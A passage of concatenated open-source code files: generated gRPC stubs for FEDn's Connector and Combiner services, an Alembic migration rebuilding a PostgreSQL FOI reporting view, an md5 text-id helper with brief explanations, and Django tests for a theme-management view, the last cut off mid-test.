request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionResponse.SerializeToString,
),
'SendHeartbeat': grpc.unary_unary_rpc_method_handler(
servicer.SendHeartbeat,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Heartbeat.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'ReassignClient': grpc.unary_unary_rpc_method_handler(
servicer.ReassignClient,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReassignRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'ReconnectClient': grpc.unary_unary_rpc_method_handler(
servicer.ReconnectClient,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReconnectRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.Connector', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Connector(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def AllianceStatusStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Connector/AllianceStatusStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def SendStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/SendStatus',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListActiveClients(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/ListActiveClients',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ListClientsRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientList.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AcceptingClients(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/AcceptingClients',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendHeartbeat(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/SendHeartbeat',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Heartbeat.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ReassignClient(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/ReassignClient',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReassignRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ReconnectClient(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/ReconnectClient',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReconnectRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class CombinerStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ModelUpdateRequestStream = channel.unary_stream(
'/grpc.Combiner/ModelUpdateRequestStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.FromString,
)
self.ModelUpdateStream = channel.unary_stream(
'/grpc.Combiner/ModelUpdateStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.FromString,
)
self.ModelValidationRequestStream = channel.unary_stream(
'/grpc.Combiner/ModelValidationRequestStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.FromString,
)
self.ModelValidationStream = channel.unary_stream(
'/grpc.Combiner/ModelValidationStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.FromString,
)
self.SendModelUpdateRequest = channel.unary_unary(
'/grpc.Combiner/SendModelUpdateRequest',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.SendModelUpdate = channel.unary_unary(
'/grpc.Combiner/SendModelUpdate',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.SendModelValidationRequest = channel.unary_unary(
'/grpc.Combiner/SendModelValidationRequest',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.SendModelValidation = channel.unary_unary(
'/grpc.Combiner/SendModelValidation',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
class CombinerServicer(object):
"""Missing associated documentation comment in .proto file."""
def ModelUpdateRequestStream(self, request, context):
"""Stream endpoints for training/validation pub/sub
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModelUpdateStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModelValidationRequestStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModelValidationStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelUpdateRequest(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelUpdate(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelValidationRequest(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelValidation(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CombinerServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'ModelUpdateRequestStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelUpdateRequestStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.SerializeToString,
),
'ModelUpdateStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelUpdateStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.SerializeToString,
),
'ModelValidationRequestStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelValidationRequestStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.SerializeToString,
),
'ModelValidationStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelValidationStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.SerializeToString,
),
'SendModelUpdateRequest': grpc.unary_unary_rpc_method_handler(
servicer.SendModelUpdateRequest,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'SendModelUpdate': grpc.unary_unary_rpc_method_handler(
servicer.SendModelUpdate,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'SendModelValidationRequest': grpc.unary_unary_rpc_method_handler(
servicer.SendModelValidationRequest,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'SendModelValidation': grpc.unary_unary_rpc_method_handler(
servicer.SendModelValidation,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.Combiner', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Combiner(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def ModelUpdateRequestStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelUpdateRequestStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def ModelUpdateStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelUpdateStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def ModelValidationRequestStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelValidationRequestStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def ModelValidationStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelValidationStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def SendModelUpdateRequest(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelUpdateRequest',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendModelUpdate(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelUpdate',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendModelValidationRequest(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelValidationRequest',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendModelValidation(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelValidation',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
# ---------------------------------------------------------------------------
# File: datawarehouse/edw_migrations/versions/58c33fb2322c_update_viw_cfrrfdreport.py
# Repo: bcgov/foi-reporting (Apache-2.0)
# ---------------------------------------------------------------------------
"""update_viw_cfrrfdreport
Revision ID: 58c33fb2322c
Revises: b6a8f2338f16
Create Date: 2022-03-17 14:50:05.897051
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '58c33fb2322c'
down_revision = 'b6a8f2338f16'
branch_labels = None
depends_on = None
def upgrade():
op.execute('DROP VIEW public.viw_cfrrfdreport; CREATE OR REPLACE VIEW public.viw_cfrrfdreport AS SELECT r.visualrequestfilenumber AS "Request ID", rd.redactiondescription AS "Request Description", rfd.createddate AS "Request Start Date", eco2.officedescription AS "Office of Primary Interest", rfd.completeddate AS "Completed Date", rfds.reqfordocstatus AS "RFD Status", rd.status AS "Request Status", rd.primaryusername AS "Primary User", rfd.requestdescription AS "RFD Comments", frfdcf.rfdage AS "RFD Age", rd.requestage AS "Request Age", rfd.duedate AS "Due Date", rfd.createddate AS "Requested Date", frfdcf.remainingdays AS "Remaining Days", frfdcf.elapseddays AS "Processed Days", rt.requesttypename AS "Request Type", eco.officedescription AS "Office Name", eco.officecode AS "Office Code" FROM "factRequestForDocuments" rfd LEFT JOIN "dimRequests" r ON rfd.foirequestid = r.foirequestid LEFT JOIN "factRequestDetails" rd ON r.foirequestid = rd.foirequestid AND rd.activeflag = \'Y\'::bpchar LEFT JOIN "dimRequestForDocumentsStatus" rfds ON rfd.reqfordocstatusid = rfds.reqfordocstatusid LEFT JOIN "dimRequestTypes" rt ON rt.requesttypeid = rfd.requesttypeid LEFT JOIN "dimECOffice" eco ON eco.officeid = rfd.officeid LEFT JOIN "dimECOffice" eco2 ON eco2.officeid = rfd.programofficeid LEFT JOIN "factRequestRFDCalculatedFields" frfdcf ON rfd.foirequestid = frfdcf.foirequestid and rfd.actionid = frfdcf.actionid WHERE rfd.activeflag = \'Y\'::bpchar;ALTER TABLE public.viw_cfrrfdreport OWNER TO postgres;GRANT ALL ON TABLE public.viw_cfrrfdreport TO postgres;GRANT SELECT ON TABLE public.viw_cfrrfdreport TO redash_role;')
def downgrade():
op.execute('DROP VIEW public.viw_cfrrfdreport; CREATE OR REPLACE VIEW public.viw_cfrrfdreport AS SELECT r.visualrequestfilenumber AS "Request ID", rd.redactiondescription AS "Request Description", rfd.createddate AS "Request Start Date", eco2.officedescription AS "Office of Primary Interest", rfd.completeddate AS "Completed Date", rfds.reqfordocstatus AS "RFD Status", rd.status AS "Request Status", rd.primaryusername AS "Primary User", rfd.requestdescription AS "RFD Comments", frfdcf.rfdage AS "RFD Age", rd.requestage AS "Request Age", rfd.duedate AS "Due Date", rfd.createddate AS "Requested Date", frfdcf.remainingdays AS "Remaining Days", frfdcf.elapseddays AS "Processed Days", rt.requesttypename AS "Request Type", eco.officedescription AS "Office Name", eco.officecode AS "Office Code" FROM "factRequestForDocuments" rfd LEFT JOIN "dimRequests" r ON rfd.foirequestid = r.foirequestid LEFT JOIN "factRequestDetails" rd ON r.foirequestid = rd.foirequestid AND rd.activeflag = \'Y\'::bpchar LEFT JOIN "dimRequestForDocumentsStatus" rfds ON rfd.reqfordocstatusid = rfds.reqfordocstatusid LEFT JOIN "dimRequestTypes" rt ON rt.requesttypeid = rfd.requesttypeid LEFT JOIN "dimECOffice" eco ON eco.officeid = rfd.officeid LEFT JOIN "dimECOffice" eco2 ON eco2.officeid = rfd.programofficeid LEFT JOIN "factRequestRFDCalculatedFields" frfdcf ON rfd.foirequestid = frfdcf.foirequestid and rfd.actionid = frfdcf.actionid WHERE rfd.activeflag = \'Y\'::bpchar;ALTER TABLE public.viw_cfrrfdreport OWNER TO postgres;GRANT ALL ON TABLE public.viw_cfrrfdreport TO postgres;GRANT SELECT ON TABLE public.viw_cfrrfdreport TO redash_role;')
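The `revision` / `down_revision` identifiers above are how Alembic chains migrations into an ordered history. A minimal sketch of how such a chain resolves upgrade order, using the two revision ids from this file and treating `b6a8f2338f16` as the base purely for illustration:

```python
# Alembic orders migrations by following down_revision links back to the base.
# Revision ids are taken from the migration above; treating b6a8f2338f16 as
# the base (down_revision=None) is an illustrative assumption.
revisions = {
    "b6a8f2338f16": None,            # base revision (assumed here)
    "58c33fb2322c": "b6a8f2338f16",  # this migration points at its parent
}

def upgrade_path(target, revisions):
    """Walk down_revision links from target back to the base, oldest first."""
    path = []
    node = target
    while node is not None:
        path.append(node)
        node = revisions[node]
    return list(reversed(path))

# Upgrading to 58c33fb2322c applies the parent first, then this migration.
order = upgrade_path("58c33fb2322c", revisions)
```

This is why `alembic upgrade head` never needs explicit ordering: each migration carries a single pointer to its parent.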
# ---------------------------------------------------------------------------
# File: transformertopic/utils/generateTextId.py
# Repo: nareto/transformertopic (MIT)
# ---------------------------------------------------------------------------
import hashlib
def generateTextId(text: str):
    return hashlib.md5(text.encode('utf-8')).hexdigest()
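A quick usage sketch of `generateTextId` (the helper is restated so the snippet is self-contained): md5 hex digests are deterministic and always 32 hex characters, which makes them convenient as stable document keys, though md5 is not collision-resistant and should not be used for anything security-sensitive.

```python
import hashlib

def generateTextId(text: str):
    # Deterministic 32-character hex id derived from the text content.
    return hashlib.md5(text.encode('utf-8')).hexdigest()

# The same text always maps to the same id.
doc_id = generateTextId("some document text")
```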
# ---------------------------------------------------------------------------
# File: tests/gbe/themes/test_manage_theme.py
# Repo: bethlakshmi/gbe-divio-djangocms-python2.7 (Apache-2.0)
# ---------------------------------------------------------------------------
from django.test import TestCase
from django.test import Client
from django.urls import reverse
from tests.factories.gbe_factories import (
ProfileFactory,
StyleElementFactory,
StyleGroupFactory,
StyleLabelFactory,
StyleValueFactory,
StyleValueImageFactory,
StyleVersionFactory,
TestURLFactory,
UserFactory,
)
from filer.models.imagemodels import Image
from tests.functions.gbe_functions import (
grant_privilege,
login_as,
set_image
)
from easy_thumbnails.files import get_thumbnailer
class TestManageTheme(TestCase):
view_name = "manage_theme"
px_input = ('<input type="number" name="%d-value_%d" value="%d" ' +
'class="pixel-input" required id="id_%d-value_%d">')
def setUp(self):
self.client = Client()
self.user = ProfileFactory().user_object
grant_privilege(self.user, u'Theme Editor')
self.value = StyleValueFactory()
self.url = reverse(
self.view_name,
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk])
self.title = "Manage {}, version {:.1f}".format(
self.value.style_version.name,
self.value.style_version.number)
self.style_url = reverse(
"theme_style",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk])
def test_no_login(self):
response = self.client.get(self.url)
self.assertRedirects(response,
"/login/?next=%s" % self.url,
fetch_redirect_response=False)
def test_unauthorized_user(self):
login_as(ProfileFactory(), self)
response = self.client.get(self.url)
self.assertEqual(403, response.status_code)
def test_get(self):
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
self.assertContains(response, self.title)
self.assertContains(response, self.value.value)
self.assertContains(response,
self.value.style_property.selector)
self.assertContains(response,
self.value.style_property.selector.used_for)
self.assertContains(response,
self.value.style_property.style_property)
self.assertContains(response, self.style_url)
def test_get_group(self):
self.value.style_property.label = StyleLabelFactory()
self.value.style_property.element = StyleElementFactory(
group=self.value.style_property.label.group)
self.value.style_property.save()
test_url = TestURLFactory()
self.value.style_property.label.group.test_urls.add(test_url)
same_elem_label = StyleValueFactory(
style_property__label=self.value.style_property.label,
style_property__element=self.value.style_property.element,
style_version=self.value.style_version)
same_label = StyleValueFactory(
style_property__label=self.value.style_property.label,
style_property__element=StyleElementFactory(
group=self.value.style_property.label.group),
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
self.assertContains(response, self.value.value)
self.assertContains(response, same_elem_label.value)
self.assertContains(response, same_label.value)
self.assertContains(response,
self.value.style_property.label.name)
self.assertContains(response,
self.value.style_property.element.sample_html)
self.assertContains(response,
same_label.style_property.element.sample_html)
self.assertContains(response,
self.value.style_property.label.group.name)
self.assertContains(response, test_url.display_name)
def test_get_image(self):
Image.objects.all().delete()
other_image = set_image()
image_style = StyleValueImageFactory(
style_version=self.value.style_version,
image=set_image(folder_name='Backgrounds'))
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response,
image_style.style_property.selector)
self.assertContains(response,
image_style.style_property.style_property)
self.assertContains(
response,
'''<input type="radio" name="%s-image" value="%s"
id="id_%s-image_1" checked>''' % (
image_style.pk,
image_style.image.pk,
image_style.pk),
html=True)
self.assertNotContains(
response,
get_thumbnailer(other_image).get_thumbnail(
{'size': (100, 100), 'crop': False}).url)
def test_get_empty(self):
empty = StyleVersionFactory()
login_as(self.user, self)
response = self.client.get(reverse(
self.view_name,
urlconf="gbe.themes.urls",
args=[empty.pk]))
self.assertContains(
response,
"Manage {}, version {:.1f}".format(empty.name, empty.number))
self.assertContains(response, reverse(
"theme_style",
urlconf="gbe.themes.urls",
args=[empty.pk]))
def test_get_bad_id(self):
login_as(self.user, self)
response = self.client.get(reverse(
self.view_name,
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk+1]))
self.assertEqual(404, response.status_code)
def test_post_finish(self):
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'finish': "Finish",
}, follow=True)
self.assertContains(
response,
"Updated %s" % self.value.style_version)
self.assertRedirects(response, "%s?changed_id=%d" % (
reverse('themes_list', urlconf='gbe.themes.urls'),
self.value.style_version.pk))
def test_post_group(self):
self.value.style_property.label = StyleLabelFactory()
self.value.style_property.element = StyleElementFactory(
group=self.value.style_property.label.group)
self.value.style_property.save()
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'finish': "Finish",
}, follow=True)
self.assertContains(
response,
"Updated %s" % self.value.style_version)
self.assertRedirects(response, "%s?changed_id=%d" % (
reverse('themes_list', urlconf='gbe.themes.urls'),
self.value.style_version.pk))
def test_post_update(self):
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'update': "Update",
}, follow=True)
self.assertContains(response, self.title)
self.assertContains(
response,
"Updated %s" % self.value.style_version)
self.assertContains(response, 'rgba(255,255,255,0)')
self.assertContains(response,
self.value.style_property.selector)
self.assertContains(response,
self.value.style_property.selector.used_for)
self.assertContains(response,
self.value.style_property.style_property)
self.assertContains(response, self.style_url)
def test_post_update_change_image(self):
Image.objects.all().delete()
other_image = set_image(folder_name='Backgrounds')
image_style = StyleValueImageFactory(
style_version=self.value.style_version,
image=set_image(folder_name='Backgrounds'))
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-style_property' % image_style.pk:
image_style.style_property.pk,
"%s-image" % image_style.pk: other_image.pk,
"%s-add_image" % image_style.pk: "",
'update': "Update",
}, follow=True)
self.assertContains(response,
image_style.style_property.selector)
self.assertContains(response,
